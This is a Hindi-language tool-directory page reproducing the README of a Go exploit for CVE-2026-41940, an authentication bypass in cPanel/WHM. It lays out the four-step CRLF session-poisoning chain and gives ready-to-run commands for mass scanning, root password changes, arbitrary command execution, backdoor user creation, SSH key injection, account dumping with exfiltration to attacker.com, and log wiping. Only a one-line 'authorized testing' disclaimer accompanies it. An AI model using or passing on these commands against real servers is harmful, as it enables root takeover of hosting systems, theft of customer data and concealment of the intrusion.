Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940-Exploit-PoC — CVE-2026-41940 के लिए एक्सप्लॉइट PoC, जो CRLF इंजेक्शन के माध्यम से cPanel और WHM प्रमाणीकरण बायपास है। इसमें मास स्कैनिंग, पोस्ट-एक्सप्लॉइटेशन क्रियाएँ, और अधिकृत परीक्षण के लिए एक इंटरैक्टिव शेल शामिल है। | Kitploit
उपकरण/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

CVE-2026-41940 के लिए एक्सप्लॉइट PoC, जो CRLF इंजेक्शन के माध्यम से cPanel और WHM प्रमाणीकरण बायपास है। इसमें मास स्कैनिंग, पोस्ट-एक्सप्लॉइटेशन क्रियाएँ, और अधिकृत परीक्षण के लिए एक इंटरैक्टिव शेल शामिल है।

रिपॉजिटरी देखेंवेबसाइट
21275 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-41940 एक्सप्लॉइट PoC – cPanel और WHM प्रमाणीकरण बाईपास

CVE-2026-41940 CVSS Go Version License

टूल द्वारा: Ishan Oshada | GitHub

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए। अनधिकृत उपयोग अवैध है।

1


📋 विषय-सूची

  • भेद्यता अवलोकन
  • एक्सप्लॉइट श्रृंखला
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग उदाहरण
  • पोस्ट-एक्सप्लॉइट क्रियाएँ
  • इंटरैक्टिव शेल कमांड
  • urls.txt के साथ बड़े पैमाने पर स्कैनिंग
  • आउटपुट उदाहरण
  • विकल्प संदर्भ
  • प्रभावित संस्करण
  • सभी प्लेटफार्मों के लिए निर्माण
  • FAQ और समस्या निवारण
  • अस्वीकरण
  • लेखक

2

भेद्यता अवलोकन

CVE-2026-41940 cPanel और WHM (संस्करण < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5) में एक CRLF इंजेक्शन भेद्यता है।

saveSession() फ़ंक्शन filter_sessiondata() लागू करने के बाद सत्र डेटा लिखता है, लेकिन फ़िल्टर बहुत देर से लागू किया जाता है। Authorization: Basic हेडर के अंदर CRLF (\r\n) वर्णों को इंजेक्ट करके, एक हमलावर डिस्क पर मौजूद सत्र फ़ाइल को मनमाने कुंजी-मूल्य जोड़ों (जैसे, hasroot=1, tfa_verified=1, user=root) के साथ विषाक्त कर सकता है।

जब विषाक्त सत्र बाद में लोड किया जाता है, तो cPanel/WHM बिना किसी पासवर्ड के पूर्ण रूट एक्सेस प्रदान करता है।

CVSS स्कोर: 10.0 (गंभीर)

  • हमला वेक्टर: नेटवर्क
  • हमला जटिलता: कम
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • गोपनीयता: उच्च
  • अखंडता: उच्च
  • उपलब्धता: उच्च

एक्सप्लॉइट श्रृंखला (4 चरण)

चरणक्रियाविवरण
1POST /login/?login_only=1गलत क्रेडेंशियल्स के साथ प्री-ऑथ सत्र कुकी का अनुरोध करें
2GET / + CRLF Authorization हेडरसत्र फ़ाइल को hasroot=1, user=root, आदि के साथ विषाक्त करें
3GET /scripts2/listacctsसत्र कैश को विषाक्त फ़ाइल को पुनः लोड करने के लिए बाध्य करें (प्रसार)
4GET /cpsess<TOKEN>/json-api/versionरूट एक्सेस सत्यापित करें – सफलता = 200 + संस्करण डेटा

विशेषताएँ

  • ✅ एकल और बड़े पैमाने पर स्कैनिंग (फ़ाइल इनपुट, stdin पाइप)
  • ✅ थ्रेडेड स्कैनिंग (100+ थ्रेड तक समवर्तीता नियंत्रण)
  • ✅ वर्बोज़ मोड (--verbose) – पूर्ण HTTP अनुरोध/प्रतिक्रियाएँ दिखाता है
  • ✅ JSON आउटपुट (भेद्य लक्ष्य मिलने पर स्वतः सहेजता है)
  • ✅ 10 पोस्ट-एक्सप्लॉइट क्रियाएँ (नीचे तालिका देखें)
  • ✅ क्रॉस-प्लेटफ़ॉर्म (Windows, Linux, macOS)
  • ✅ कोई बाहरी निर्भरता नहीं (केवल Go मानक पुस्तकालय)
  • ✅ रंगीन टर्मिनल आउटपुट स्पष्ट बॉक्स्ड परिणामों के साथ
  • ✅ सत्र स्थिरता – कीप-अलाइव तंत्र
  • ✅ इंटरैक्टिव WHM शेल कमांड इतिहास के साथ

स्थापना

पूर्वापेक्षाएँ

  • Go 1.20 या उच्चतर (डाउनलोड)

रिपॉजिटरी क्लोन करें

git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

निष्पादन योग्य बनाएँ

Windows

go build -o cpanel_sniper.exe main.go

Linux / macOS

go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

सीधे चलाएँ (बिना निर्माण के)

go run main.go -u https://target.com:2087

पूर्व-निर्मित बाइनरी (सबसे तेज़ तरीका)

स्रोत से निर्माण करने के बजाय, आप रिपॉजिटरी से नवीनतम स्थिर निष्पादन योग्य सीधे डाउनलोड कर सकते हैं। ये हर अपडेट के लिए स्वचालित रूप से उत्पन्न होते हैं:

प्लेटफ़ॉर्मस्थान
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper

नोट: यदि Linux या macOS का उपयोग कर रहे हैं, तो डाउनलोड करने के बाद निष्पादन अनुमतियाँ देना याद रखें:


त्वरित प्रारंभ

# बुनियादी स्कैन
go run main.go -u https://target.com:2087

# सभी cPanel खाते सूचीबद्ध करें
go run main.go -u https://target.com:2087 -action list

# इंटरैक्टिव WHM शेल
go run main.go -u https://target.com:2087 -action shell

# urls.txt के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 20 -o results.json

उपयोग उदाहरण (तालिका)

#उद्देश्यकमांड
1बुनियादी एकल लक्ष्य स्कैनgo run main.go -u https://target.com:2087
2सभी cPanel खाते सूचीबद्ध करेंgo run main.go -u https://target.com:2087 -action list
3रूट पासवर्ड बदलेंgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4सिस्टम कमांड निष्पादित करेंgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5सर्वर जानकारी प्राप्त करेंgo run main.go -u https://target.com:2087 -action info
6बैकडोर उपयोगकर्ता बनाएँgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7API टोकन बनाएँ (गुप्त)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8SSH कुंजी इंजेक्ट करेंgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9खाता डंप और बाहर निकालेंgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10लॉग मिटाएँ और निशान छिपाएँgo run main.go -u https://target.com:2087 -action wipe
11इंटरैक्टिव WHM शेलgo run main.go -u https://target.com:2087 -action shell
12फ़ाइल से बड़े पैमाने पर स्कैनgo run main.go -l urls.txt -t 20 -o results.json
13परिणाम JSON में सहेजेंgo run main.go -u https://target.com:2087 -o scan_results.json
14वर्बोज़ डिबगिंग सक्षम करेंgo run main.go -u https://target.com:2087 --verbose
15अन्य टूल से पाइपcat urls.txt | go run main.go -t 20
16टाइमआउट बढ़ाएँgo run main.go -u https://target.com:2087 -timeout 30

पोस्ट-एक्सप्लॉइट क्रियाएँ

टूल डाउनलोड करें